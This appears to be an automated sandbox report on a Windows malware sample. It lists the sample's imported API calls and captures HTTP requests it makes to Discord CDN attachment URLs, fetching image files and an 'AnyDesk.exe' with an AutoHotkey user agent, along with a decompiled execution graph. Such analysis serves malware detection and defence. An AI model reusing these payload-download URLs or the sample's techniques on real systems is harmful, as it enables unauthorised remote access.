GetPrivateProfileStringW, GetPrivateProfileSectionW, GetPrivateProfileSectionNamesW, WritePrivateProfileStringW, WritePrivateProfileSectionW, SetEndOfFile, GetACP, GetFileType, GetStdHandle, SetFilePointerEx, SystemTimeToFileTime, FileTimeToSystemTime, GetFileSize, IsWow64Process, VirtualAllocEx, VirtualFreeEx, EnumResourceNamesW, LoadLibraryExW, GlobalSize, HeapReAlloc, EncodePointer, HeapFree, DecodePointer, ExitProcess, HeapAlloc, IsValidCodePage, FlsGetValue, FlsSetValue, FlsFree, FlsAlloc, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, InitializeCriticalSection, GetCPInfo, GetVersionExW, GetModuleHandleW, FreeLibrary, GetProcAddress, LoadLibraryW, GetLastError, CreateMutexW, CloseHandle, GetExitCodeThread, SetThreadPriority, CreateThread, GetStringTypeExW, lstrcmpiW, GetCurrentThreadId, GlobalUnlock, GlobalFree, GlobalAlloc, GlobalLock, SetErrorMode, SetCurrentDirectoryW, Sleep, GetTickCount, MulDiv, RtlCaptureContext, HeapSetInformation, GetVersion, HeapCreate, InitializeCriticalSectionAndSpinCount, HeapSize, HeapQueryInformation, GetCommandLineW, GetStartupInfoW, RtlUnwindEx, GetStringTypeW, RaiseException, RtlPcToFileHeader, LCMapStringW, GetConsoleCP, GetConsoleMode, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, QueryPerformanceCounter, GetOEMCP, SetFilePointer, WriteConsoleW, SetStdHandle, FlushFileBuffers, GetFileSizeEx, GetProcessHeap
                          USER32.dllGetDlgItem, SetDlgItemTextW, MessageBeep, GetCursorInfo, GetLastInputInfo, GetSystemMenu, GetMenuItemCount, GetMenuItemID, GetSubMenu, GetMenuStringW, ExitWindowsEx, SetMenu, FlashWindow, GetPropW, SetPropW, RemovePropW, MapWindowPoints, RedrawWindow, SetWindowLongPtrW, SetParent, GetClassInfoExW, DefDlgProcW, GetAncestor, UpdateWindow, GetMessagePos, GetClassLongPtrW, CallWindowProcW, CheckRadioButton, IntersectRect, GetUpdateRect, PtInRect, CreateDialogIndirectParamW, GetWindowLongPtrW, CreateAcceleratorTableW, DestroyAcceleratorTable, InsertMenuItemW, SetMenuDefaultItem, RemoveMenu, SetMenuItemInfoW, IsMenu, GetMenuItemInfoW, CreateMenu, CreatePopupMenu, SetMenuInfo, AppendMenuW, DestroyMenu, TrackPopupMenuEx, CopyImage, CreateIconIndirect, CreateIconFromResourceEx, EnumClipboardFormats, GetWindow, BringWindowToTop, MessageBoxW, GetTopWindow, GetQueueStatus, SendDlgItemMessageW, SetClipboardViewer, LoadAcceleratorsW, EnableMenuItem, GetMenu, CreateWindowExW, RegisterClassExW, LoadCursorW, DestroyWindow, EnableWindow, MapVirtualKeyW, VkKeyScanExW, MapVirtualKeyExW, GetKeyboardLayoutNameW, ActivateKeyboardLayout, GetGUIThreadInfo, GetWindowTextW, mouse_event, WindowFromPoint, GetSystemMetrics, keybd_event, SetKeyboardState, GetKeyboardState, GetCursorPos, GetAsyncKeyState, AttachThreadInput, SendInput, UnregisterHotKey, RegisterHotKey, SendMessageTimeoutW, UnhookWindowsHookEx, SetWindowsHookExW, PostThreadMessageW, IsCharAlphaNumericW, IsCharUpperW, IsCharLowerW, ToUnicodeEx, GetKeyboardLayout, CallNextHookEx, CharLowerW, ReleaseDC, GetDC, OpenClipboard, GetClipboardData, GetClipboardFormatNameW, CloseClipboard, SetClipboardData, EmptyClipboard, PostMessageW, FindWindowW, EndDialog, IsWindow, DispatchMessageW, TranslateMessage, ShowWindow, CountClipboardFormats, SetWindowLongW, ScreenToClient, IsDialogMessageW, DialogBoxParamW, SetForegroundWindow, DefWindowProcW, FillRect, DrawIconEx, GetSysColorBrush, GetSysColor, RegisterWindowMessageW, EnumDisplayMonitors, IsIconic, IsZoomed, EnumWindows, ChangeClipboardChain, GetWindowTextLengthW, SendMessageW, IsWindowEnabled, GetWindowLongW, GetKeyState, TranslateAcceleratorW, KillTimer, PeekMessageW, GetFocus, GetClassNameW, GetWindowThreadProcessId, GetForegroundWindow, InvalidateRect, SetLayeredWindowAttributes, SetWindowPos, SetWindowRgn, SetFocus, SetActiveWindow, ClientToScreen, EnumChildWindows, MoveWindow, GetWindowRect, GetMonitorInfoW, MonitorFromPoint, GetClientRect, SystemParametersInfoW, AdjustWindowRectEx, DrawTextW, SetRect, GetIconInfo, SetWindowTextW, IsWindowVisible, BlockInput, GetMessageW, SetTimer, GetParent, GetDlgCtrlID, CharUpperW, IsClipboardFormatAvailable, CheckMenuItem, PostQuitMessage, IsCharAlphaW, LoadImageW, DestroyIcon
                          GDI32.dllGetPixel, GetClipRgn, GetCharABCWidthsW, SetBkMode, CreatePatternBrush, SetBrushOrgEx, EnumFontFamiliesExW, CreateDIBSection, GdiFlush, SetBkColor, ExcludeClipRect, SetTextColor, GetClipBox, BitBlt, CreateCompatibleBitmap, GetSystemPaletteEntries, GetDIBits, CreateCompatibleDC, CreatePolygonRgn, CreateRectRgn, CreateRoundRectRgn, CreateEllipticRgn, DeleteDC, GetObjectW, GetTextMetricsW, GetTextFaceW, SelectObject, GetStockObject, CreateDCW, CreateSolidBrush, CreateFontW, FillRgn, GetDeviceCaps, DeleteObject
                          COMDLG32.dllCommDlgExtendedError, GetSaveFileNameW, GetOpenFileNameW
                          ADVAPI32.dllRegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, RegQueryValueExW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, GetUserNameW, RegEnumKeyExW, RegEnumValueW, RegQueryInfoKeyW, RegOpenKeyExW, RegCloseKey, RegConnectRegistryW, RegDeleteValueW
                          SHELL32.dllDragQueryPoint, SHEmptyRecycleBinW, SHFileOperationW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetDesktopFolder, SHGetMalloc, SHGetFolderPathW, ShellExecuteExW, Shell_NotifyIconW, DragFinish, DragQueryFileW, ExtractIconW
                          ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, CoInitialize, CoUninitialize, CLSIDFromString, CLSIDFromProgID, CoGetObject, StringFromGUID2, CreateStreamOnHGlobal
                          OLEAUT32.dllSafeArrayGetLBound, GetActiveObject, SysStringLen, OleLoadPicture, SafeArrayUnaccessData, SafeArrayGetElemsize, SafeArrayAccessData, SafeArrayUnlock, SafeArrayPtrOfIndex, SafeArrayLock, SafeArrayGetDim, SafeArrayDestroy, SafeArrayGetUBound, VariantCopyInd, SafeArrayCopy, SysAllocString, VariantChangeType, VariantClear, SafeArrayCreate, SysFreeString
                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States
                          TimestampSource PortDest PortSource IPDest IP
                          Mar 29, 2024 05:21:00.664577961 CET49699443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:00.664613962 CET44349699162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:00.664685965 CET49699443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:00.673480034 CET49699443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:00.673494101 CET44349699162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:00.875636101 CET44349699162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:00.875713110 CET49699443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:00.934186935 CET49699443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:00.934207916 CET44349699162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:00.934608936 CET44349699162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:00.934669018 CET49699443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:00.936556101 CET49699443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:00.980248928 CET44349699162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:01.112256050 CET44349699162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:01.112315893 CET44349699162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:01.112387896 CET49699443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:01.175560951 CET49699443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:01.175581932 CET44349699162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:01.262047052 CET49700443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:01.262099028 CET44349700162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:01.262161970 CET49700443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:01.262671947 CET49700443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:01.262686014 CET44349700162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:01.458328962 CET44349700162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:01.458533049 CET49700443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:01.459232092 CET49700443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:01.459239006 CET44349700162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:01.459527016 CET49700443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:01.459534883 CET44349700162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:01.702513933 CET44349700162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:01.702580929 CET44349700162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:01.702626944 CET49700443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:01.702658892 CET49700443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:01.703542948 CET49700443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:01.703555107 CET44349700162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:01.730220079 CET49701443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:01.730247021 CET44349701162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:01.730350018 CET49701443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:01.730611086 CET49701443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:01.730626106 CET44349701162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:01.931878090 CET44349701162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:01.932028055 CET49701443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:01.932693958 CET49701443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:01.932703972 CET44349701162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:01.932864904 CET49701443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:01.932868958 CET44349701162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:02.178917885 CET44349701162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:02.178976059 CET44349701162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:02.179014921 CET49701443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:02.179014921 CET49701443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:02.179826021 CET49701443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:02.179840088 CET44349701162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:02.198914051 CET49702443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:02.198941946 CET44349702162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:02.199052095 CET49702443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:02.199300051 CET49702443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:02.199312925 CET44349702162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:02.393943071 CET44349702162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:02.394047022 CET49702443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:02.394874096 CET49702443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:02.394881010 CET44349702162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:02.395133972 CET49702443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:02.395138025 CET44349702162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:02.635430098 CET44349702162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:02.635487080 CET44349702162.159.133.233192.168.2.6
                          Mar 29, 2024 05:21:02.635550022 CET49702443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:02.636192083 CET49702443192.168.2.6162.159.133.233
                          Mar 29, 2024 05:21:02.636209011 CET44349702162.159.133.233192.168.2.6
                          TimestampSource PortDest PortSource IPDest IP
                          Mar 29, 2024 05:21:00.562293053 CET5370253192.168.2.61.1.1.1
                          Mar 29, 2024 05:21:00.657572985 CET53537021.1.1.1192.168.2.6
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Mar 29, 2024 05:21:00.562293053 CET192.168.2.61.1.1.10xac19Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Mar 29, 2024 05:21:00.657572985 CET1.1.1.1192.168.2.60xac19No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                          Mar 29, 2024 05:21:00.657572985 CET1.1.1.1192.168.2.60xac19No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                          Mar 29, 2024 05:21:00.657572985 CET1.1.1.1192.168.2.60xac19No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                          Mar 29, 2024 05:21:00.657572985 CET1.1.1.1192.168.2.60xac19No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                          Mar 29, 2024 05:21:00.657572985 CET1.1.1.1192.168.2.60xac19No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                          • cdn.discordapp.com
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.649699162.159.133.2334435924C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe
                          TimestampBytes transferredDirectionData
                          2024-03-29 04:21:00 UTC245OUTGET /attachments/946434985617944649/1187447469743804447/1img.png?ex=6596eba2&is=658476a2&hm=0a3291a0428a9a3a412cccb212e697c45efde312d3ae0a17818b7bba37eb978d& HTTP/1.1
                          User-Agent: AutoHotkey
                          Host: cdn.discordapp.com
                          Cache-Control: no-cache
                          2024-03-29 04:21:01 UTC1062INHTTP/1.1 404 Not Found
                          Date: Fri, 29 Mar 2024 04:21:01 GMT
                          Content-Type: text/plain;charset=UTF-8
                          Content-Length: 36
                          Connection: close
                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                          Set-Cookie: __cf_bm=WAgSjmN_wP2eFedjicHfRrdUiKndDMaS86a4K75qnaQ-1711686061-1.0.1.1-w9CFE_AePNDy_Wk3xZI6zK2dF1cZjaN2undiK6NtC2SylUPBRZx1h1rEe28blv8UENKQFkTayXcFWGs54KEpLA; path=/; expires=Fri, 29-Mar-24 04:51:01 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8V6xnPq1xbTgxH6gOWx21TemBvlKNtiv4oscg8DiiDreyU66khMHs4Y04SDY0%2Fupk7IHVOnOqHwUHTqOrzN45cRFfo3n9JskjwMUGXcz5%2FktyKp%2BKhQlCKtHeTGcuLzsaL3tlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Set-Cookie: _cfuvid=NokBoZytmEIMqSMZLzeheyttRjABninEj.riDLOMx_M-1711686061063-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                          Server: cloudflare
                          CF-RAY: 86bd12198ddc05ce-IAD
                          alt-svc: h3=":443"; ma=86400
                          2024-03-29 04:21:01 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                          Data Ascii: This content is no longer available.


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.649700162.159.133.2334435924C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe
                          TimestampBytes transferredDirectionData
                          2024-03-29 04:21:01 UTC497OUTGET /attachments/946434985617944649/1187447469492150292/3img.png?ex=6596eba2&is=658476a2&hm=e54785c353dcbe635c35016ed6a0babbb34588ac67d1176df058c308ee2bef44& HTTP/1.1
                          User-Agent: AutoHotkey
                          Host: cdn.discordapp.com
                          Cache-Control: no-cache
                          Cookie: __cf_bm=WAgSjmN_wP2eFedjicHfRrdUiKndDMaS86a4K75qnaQ-1711686061-1.0.1.1-w9CFE_AePNDy_Wk3xZI6zK2dF1cZjaN2undiK6NtC2SylUPBRZx1h1rEe28blv8UENKQFkTayXcFWGs54KEpLA; _cfuvid=NokBoZytmEIMqSMZLzeheyttRjABninEj.riDLOMx_M-1711686061063-0.0.1.1-604800000
                          2024-03-29 04:21:01 UTC625INHTTP/1.1 404 Not Found
                          Date: Fri, 29 Mar 2024 04:21:01 GMT
                          Content-Type: text/plain;charset=UTF-8
                          Content-Length: 36
                          Connection: close
                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EbHSRBjCGkqqNTK04oK6XceWlvmYyEiRupfFt2LLROR3P43X0Ng54r0g2dclIl1HE88oLzk4M0P8t3AwSofZllPcyza%2F6MyRYbVWEh0aP0Vw3%2Bc2LpY2qDoO3F5OHhxDHD7biA%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 86bd121d38785a40-IAD
                          alt-svc: h3=":443"; ma=86400
                          2024-03-29 04:21:01 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                          Data Ascii: This content is no longer available.


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.649701162.159.133.2334435924C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe
                          TimestampBytes transferredDirectionData
                          2024-03-29 04:21:01 UTC497OUTGET /attachments/946434985617944649/1187447469185974412/2img.png?ex=6596eba2&is=658476a2&hm=ceac553c8fa20a5a29d3a30fafcd5022ef44d33396c849d1a84b29a8507c87e5& HTTP/1.1
                          User-Agent: AutoHotkey
                          Host: cdn.discordapp.com
                          Cache-Control: no-cache
                          Cookie: __cf_bm=WAgSjmN_wP2eFedjicHfRrdUiKndDMaS86a4K75qnaQ-1711686061-1.0.1.1-w9CFE_AePNDy_Wk3xZI6zK2dF1cZjaN2undiK6NtC2SylUPBRZx1h1rEe28blv8UENKQFkTayXcFWGs54KEpLA; _cfuvid=NokBoZytmEIMqSMZLzeheyttRjABninEj.riDLOMx_M-1711686061063-0.0.1.1-604800000
                          2024-03-29 04:21:02 UTC631INHTTP/1.1 404 Not Found
                          Date: Fri, 29 Mar 2024 04:21:02 GMT
                          Content-Type: text/plain;charset=UTF-8
                          Content-Length: 36
                          Connection: close
                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jjSik6EHcLiOpxxP1xAL6k%2BoMUGw42udkdzosPaF0VZ%2BoORFcx16y%2BGQX1GRx3Mh4cXbZf85fCscxFE4RUVXQs68LbsaTji7m4%2BEp4Nuuiu69k%2F5y4Ozg5cxfzbaFkoIylpYPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 86bd12203afa5a45-IAD
                          alt-svc: h3=":443"; ma=86400
                          2024-03-29 04:21:02 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                          Data Ascii: This content is no longer available.


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.649702162.159.133.2334435924C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe
                          TimestampBytes transferredDirectionData
                          2024-03-29 04:21:02 UTC500OUTGET /attachments/946434985617944649/1187449788539613234/AnyDesk.exe?ex=6596edcb&is=658478cb&hm=1ccb90ac0e74e5fc5ff101f4716703308a02fb42540256a74e81a4d808fbe4ef& HTTP/1.1
                          User-Agent: AutoHotkey
                          Host: cdn.discordapp.com
                          Cache-Control: no-cache
                          Cookie: __cf_bm=WAgSjmN_wP2eFedjicHfRrdUiKndDMaS86a4K75qnaQ-1711686061-1.0.1.1-w9CFE_AePNDy_Wk3xZI6zK2dF1cZjaN2undiK6NtC2SylUPBRZx1h1rEe28blv8UENKQFkTayXcFWGs54KEpLA; _cfuvid=NokBoZytmEIMqSMZLzeheyttRjABninEj.riDLOMx_M-1711686061063-0.0.1.1-604800000
                          2024-03-29 04:21:02 UTC631INHTTP/1.1 404 Not Found
                          Date: Fri, 29 Mar 2024 04:21:02 GMT
                          Content-Type: text/plain;charset=UTF-8
                          Content-Length: 36
                          Connection: close
                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LjW5pURb%2BDcAIYFDC%2B%2B%2FKrte0TLhDJBEVjIZiQkp1uzrOEETOhAlg2bXCSWmxOxdAJeOABUb7IbycRwGXfD6OsxsjnQSEP4FEpLL0Ss9iQlfC5aJCmTvIGhKHH%2F38PLNLM2bdw%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 86bd122319af20ba-IAD
                          alt-svc: h3=":443"; ma=86400
                          2024-03-29 04:21:02 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                          Data Ascii: This content is no longer available.


                          Click to jump to process

                          Click to jump to process

                          Target ID:0
                          Start time:05:20:59
                          Start date:29/03/2024
                          Path:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe"
                          Imagebase:0x140000000
                          File size:1'277'440 bytes
                          MD5 hash:DFBAF344699830430AE052254168D580
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Reset < >

                            Execution Graph

                            Execution Coverage:0.6%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:31.5%
                            Total number of Nodes:986
                            Total number of Limit Nodes:33
                            execution_graph 242690 1400569e5 242691 1400569f7 242690->242691 242692 140056a1b 242690->242692 242693 140056a25 242691->242693 242694 1400569fd 242691->242694 242692->242693 242695 14005686e DefWindowProcW 242692->242695 242698 140056a2e PostMessageW 242693->242698 242699 140056a4a 242693->242699 242694->242695 242696 140056a07 242694->242696 242697 140056880 242695->242697 242704 1400a29f0 97 API calls 242696->242704 242698->242697 242699->242697 242702 140056a61 242699->242702 242701 140056a14 242701->242697 242705 1400570b0 166 API calls _wcsupr_s_l 242702->242705 242704->242701 242705->242701 242706 1400b4000 242707 1400b4006 242706->242707 242708 1400b4020 PostMessageW MessageBoxW 242707->242708 242709 1400b40a0 242708->242709 242710 140036117 242751 1400b2480 242710->242751 242712 140032601 GetTickCount 242715 140032620 PeekMessageW 242712->242715 242720 1400325c7 242712->242720 242713 1400325da GlobalUnlock 242714 1400325ee CloseClipboard 242713->242714 242714->242712 242716 140032649 GetTickCount 242715->242716 242715->242720 242716->242720 242717 140032701 GetTickCount 242717->242720 242719 140032520 172 API calls 242719->242720 242720->242712 242720->242713 242720->242714 242720->242716 242720->242717 242720->242719 242721 140038ac5 242720->242721 242722 14008a1a0 242720->242722 242723 14008a1d1 __initmbctable 242722->242723 242724 14008a1c8 242722->242724 242726 14008a20d 242723->242726 242729 14008a1da 242723->242729 242732 14008a233 242723->242732 242771 14008a6b0 242724->242771 242798 1400403f0 242726->242798 242728 14008a2ca 242743 14008a52a 242728->242743 242747 14008a332 242728->242747 242807 140086990 172 API calls 5 library calls 242728->242807 242808 14008aba0 117 API calls __initmbctable 242728->242808 242809 14008aa10 119 API calls 242728->242809 242810 1400b1930 116 API calls __initmbctable 242728->242810 242729->242720 242730 14008a226 242730->242720 242731 14008a27b 242781 1400ca9a4 242731->242781 242732->242728 242732->242731 242806 1400cb11c 62 API calls 2 library calls 242732->242806 242736 14008a2a2 242737 1400403f0 94 API calls 242736->242737 242739 14008a2c5 242737->242739 242739->242720 242740 14008a609 242740->242739 242742 14008a641 GetTickCount 242740->242742 242745 14008a660 SetTimer 242742->242745 242746 14008a657 242742->242746 242743->242747 242811 140001820 116 API calls 242743->242811 242745->242739 242746->242739 242746->242745 242747->242740 242812 1400cb11c 62 API calls 2 library calls 242747->242812 242752 1400b24b5 242751->242752 242755 1400b24d8 GetForegroundWindow 242752->242755 242757 1400b2528 242752->242757 242753 1400b2560 242847 1400b2c40 153 API calls _wcsupr_s_l 242753->242847 242755->242757 242758 1400b24e6 242755->242758 242756 1400b257f 242767 1400b2559 242756->242767 242770 1400b255e 242756->242770 242757->242753 242760 1400b2551 242757->242760 242761 1400b24ef IsWindowVisible 242758->242761 242762 1400b2508 IsIconic 242758->242762 242846 1400b2e60 IsWindow IsWindowVisible GetWindowLongW LoadLibraryW GetProcAddress 242760->242846 242761->242757 242766 1400b24fc 242761->242766 242763 1400b2523 242762->242763 242764 1400b2515 ShowWindow 242762->242764 242763->242770 242764->242763 242845 1400b4300 LoadLibraryW GetProcAddress 242766->242845 242767->242770 242848 1400b2650 242767->242848 242769 1400b2504 242769->242757 242769->242762 242770->242720 242772 14008a71c 242771->242772 242776 14008a6e4 242771->242776 242772->242723 242773 14002de50 117 API calls 242773->242776 242775 1400b1930 116 API calls 242775->242776 242776->242772 242776->242773 242776->242775 242777 140005ea0 81 API calls 242776->242777 242778 14008a877 GetEnvironmentVariableW 242776->242778 242779 14008a973 GetEnvironmentVariableW 242776->242779 242813 140069610 242776->242813 242817 14008aa10 119 API calls 242776->242817 242777->242776 242778->242776 242779->242776 242782 1400caa38 242781->242782 242793 1400ca9bc 242781->242793 242824 1400cf124 DecodePointer 242782->242824 242784 1400caa3d 242825 1400ced6c 62 API calls _getptd 242784->242825 242785 1400ca9f4 RtlAllocateHeap 242788 14008a293 242785->242788 242785->242793 242788->242728 242788->242736 242789 1400caa1d 242822 1400ced6c 62 API calls _getptd 242789->242822 242793->242785 242793->242789 242794 1400caa22 242793->242794 242795 1400ca9d4 242793->242795 242821 1400cf124 DecodePointer 242793->242821 242823 1400ced6c 62 API calls _getptd 242794->242823 242795->242785 242818 1400cf080 62 API calls 2 library calls 242795->242818 242819 1400cee20 62 API calls 4 library calls 242795->242819 242820 1400cac48 GetModuleHandleW GetProcAddress ExitProcess malloc 242795->242820 242799 140040400 _wcsupr_s_l 242798->242799 242800 14004056b 242799->242800 242801 140040464 242799->242801 242802 140040484 242799->242802 242838 140040340 94 API calls _wcsupr_s_l 242801->242838 242826 140040590 242802->242826 242805 14004047f 242805->242730 242806->242731 242807->242728 242808->242728 242809->242728 242810->242728 242811->242743 242812->242740 242814 14006963e 242813->242814 242815 1400696d9 SHGetFolderPathW 242814->242815 242816 1400696f7 242815->242816 242816->242776 242817->242776 242818->242795 242819->242795 242821->242793 242822->242794 242823->242788 242824->242784 242825->242788 242827 1400405c3 242826->242827 242829 1400405f1 242826->242829 242828 1400ad210 89 API calls 242827->242828 242827->242829 242828->242829 242839 1400ad210 242829->242839 242832 1400406c0 242834 1400406e5 242832->242834 242843 14003e880 89 API calls wcsncpy 242832->242843 242833 1400ad210 89 API calls 242833->242832 242836 140040713 242834->242836 242837 1400ad210 89 API calls 242834->242837 242836->242805 242837->242836 242838->242805 242840 140040663 242839->242840 242841 1400ad22b 242839->242841 242840->242832 242840->242833 242841->242840 242844 1400cd518 89 API calls 242841->242844 242843->242834 242844->242840 242845->242769 242846->242767 242847->242756 242849 1400b265e 242848->242849 242850 1400b2666 GetWindowThreadProcessId 242848->242850 242849->242770 242851 1400b267e 242850->242851 242852 1400b2697 GetForegroundWindow IsIconic 242850->242852 242853 1400b4250 3 API calls 242851->242853 242854 1400b26c0 242852->242854 242855 1400b26b2 ShowWindow 242852->242855 242856 1400b2686 242853->242856 242857 1400b26c5 242854->242857 242859 1400b26ec 242854->242859 242884 1400b25b0 SetForegroundWindow 242854->242884 242855->242854 242856->242852 242858 1400b268a 242856->242858 242857->242770 242858->242770 242861 1400b2719 GetWindowThreadProcessId 242859->242861 242863 1400b2839 242859->242863 242869 1400b277e 242859->242869 242862 1400b272b 242861->242862 242861->242869 242864 1400b275a 242862->242864 242891 1400b4250 242862->242891 242863->242770 242868 1400b2764 AttachThreadInput 242864->242868 242864->242869 242865 1400b25b0 3 API calls 242865->242869 242867 1400b273b 242867->242864 242870 1400b273f AttachThreadInput 242867->242870 242868->242869 242869->242865 242871 1400b27e7 242869->242871 242874 1400b279f 242869->242874 242870->242864 242872 1400b2808 242871->242872 242873 1400b27f6 AttachThreadInput 242871->242873 242875 1400b2812 